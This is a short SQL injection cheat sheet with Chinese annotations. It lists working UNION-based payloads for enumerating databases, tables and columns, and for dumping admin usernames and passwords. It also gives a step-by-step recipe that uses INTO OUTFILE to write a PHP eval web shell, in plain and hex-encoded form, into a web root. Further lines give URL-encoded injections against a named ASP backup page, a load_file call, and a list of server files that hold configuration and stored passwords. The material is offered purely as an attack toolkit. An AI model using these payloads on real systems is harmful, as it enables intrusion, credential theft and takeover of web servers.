order by
[code]and 1=2 union select 1,user(),database() 查选当前用户名 库名
union select 1,group_concat(schema_name),3,4 from information_schema.schemata– //当前所有库名[/code]
[code]union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()– 当前库的所有表名[/code]
[code]union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=库的HEX– 查表名[/code]
[code]union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=表名– 查字段[/code]
[code]union select 1,concat_ws(0x3a,name,password),3,4 from admin–[/code]
[code]create table a (cmd text not null);
insert into a (cmd) values(‘<?php eval($_post[cmd])?>’);
select cmd from a into outfile ‘d:/www/1.php’; 或者select 0x3C3F706870206576616C28245F504F53545B636D645D293F3E into outfile’d:/www/1.php
drop table if exists a;[/code]
manage/Manage_backup.asp
[code]%20And%201=2%20union%20select%201,password,3,4,username%20from%20manage_user[/code]
[code]%20And%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%20from%20admin[/code]
[code]load_file(0x2F7661722F7777772F68746D6C2F776562726F6F742F6F6666696365777777726F6F742F73656374696F6E73322E706870)[/code]
常用的一些:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\my.ini //MYSQL配置文件
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件